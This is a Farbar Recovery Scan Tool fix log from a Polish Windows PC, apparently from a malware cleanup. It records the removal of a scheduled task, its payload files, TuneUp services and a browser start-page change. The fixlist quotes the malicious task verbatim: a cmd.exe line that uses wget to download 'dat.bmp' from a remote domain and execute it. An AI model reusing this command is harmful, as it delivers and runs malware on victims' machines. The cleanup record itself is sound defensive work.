Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 03-12-2014 Ran by AiR at 2014-12-04 15:11:52 Run:1 Running from C:\Users\AiR\Downloads Loaded Profile: AiR (Available profiles: AiR) Boot Mode: Normal ============================================== Content of fixlist: ***************** CloseProcesses: Task: {A355DEFE-A9E5-4BE9-A7D9-887D010D5987} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=NXCzqopbrzlpHNPSWurp;tc;1416071063 & start cmd /R dat.bmp S4 nvvad_WaveExtensible; system32\drivers\nvvad32v.sys [X] S3 TuneUpUtilitiesDrv; \??\C:\Program Files\TuneUp Utilities 2014\TuneUpUtilitiesDriver32.sys [X] S2 TuneUp.UtilitiesSvc; "C:\Program Files\TuneUp Utilities 2014\TuneUpUtilitiesService32.exe" [X] HKLM\...\Run: [] => [X] HKU\S-1-5-21-3833150328-1824991979-3301933300-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.gazeta.pl/0,0.html?p=170 C:\ProgramData\dat.bmp C:\ProgramData\wget.exe C:\ProgramData\McAfee C:\ProgramData\TuneUp Software C:\Users\AiR\AppData\Roaming\TuneUp Software C:\Windows\system32\authuitu.dll C:\Windows\system32\TURegOpt.exe C:\Windows\system32\uxtuneup.dll CMD: dir /a C:\ProgramData EmptyTemp: ***************** Processes closed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A355DEFE-A9E5-4BE9-A7D9-887D010D5987}" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A355DEFE-A9E5-4BE9-A7D9-887D010D5987}" => Key deleted successfully. C:\Windows\System32\Tasks\SYSTEM => Moved successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SYSTEM" => Key deleted successfully. nvvad_WaveExtensible => Service deleted successfully. TuneUpUtilitiesDrv => Service deleted successfully. TuneUp.UtilitiesSvc => Service deleted successfully. HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully. HKU\S-1-5-21-3833150328-1824991979-3301933300-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully. C:\ProgramData\dat.bmp => Moved successfully. C:\ProgramData\wget.exe => Moved successfully. C:\ProgramData\McAfee => Moved successfully. C:\ProgramData\TuneUp Software => Moved successfully. C:\Users\AiR\AppData\Roaming\TuneUp Software => Moved successfully. C:\Windows\system32\authuitu.dll => Moved successfully. C:\Windows\system32\TURegOpt.exe => Moved successfully. C:\Windows\system32\uxtuneup.dll => Moved successfully. ========= dir /a C:\ProgramData ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: 0DEA-C5B0 Katalog: C:\ProgramData 04.12.2014 15:11 . 04.12.2014 15:11 .. 17.11.2014 23:35 ALLPlayerRemote 14.07.2009 05:53 Application Data [C:\ProgramData] 26.10.2014 12:41 Common Files 26.10.2014 10:48 Dane aplikacji [C:\ProgramData] 14.07.2009 05:53 Desktop [C:\Users\Public\Desktop] 14.07.2009 05:53 Documents [C:\Users\Public\Documents] 26.10.2014 10:48 Dokumenty [C:\Users\Public\Documents] 26.10.2014 11:11 ESET 14.07.2009 05:53 Favorites [C:\Users\Public\Favorites] 26.10.2014 13:47 HP 26.10.2014 10:48 Menu Start [C:\ProgramData\Microsoft\Windows\Start Menu] 17.11.2014 23:35 Microsoft 12.11.2014 20:19 Microsoft Help 26.10.2014 12:29 Mozilla 17.11.2014 23:35 Napisy24 17.11.2014 22:53 Nero 04.12.2014 10:48 NVIDIA 26.10.2014 12:51 NVIDIA Corporation 15.11.2014 20:30 Oracle 26.10.2014 10:48 Pulpit [C:\Users\Public\Desktop] 14.07.2009 05:53 Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu] 15.11.2014 20:30 Sun 26.10.2014 10:48 Szablony [C:\ProgramData\Microsoft\Windows\Templates] 14.07.2009 05:53 Templates [C:\ProgramData\Microsoft\Windows\Templates] 26.10.2014 10:48 Ulubione [C:\Users\Public\Favorites] 12.11.2014 22:27 {FE8D473A-6F06-4F99-B5F4-BED72B2A038C} 0 plik(¢w) 0 bajt¢w 28 katalog(¢w) 66ÿ217ÿ615ÿ360 bajt¢w wolnych ========= End of CMD: ========= EmptyTemp: => Removed 1.9 GB temporary data. The system needed a reboot. ==== End of Fixlog ====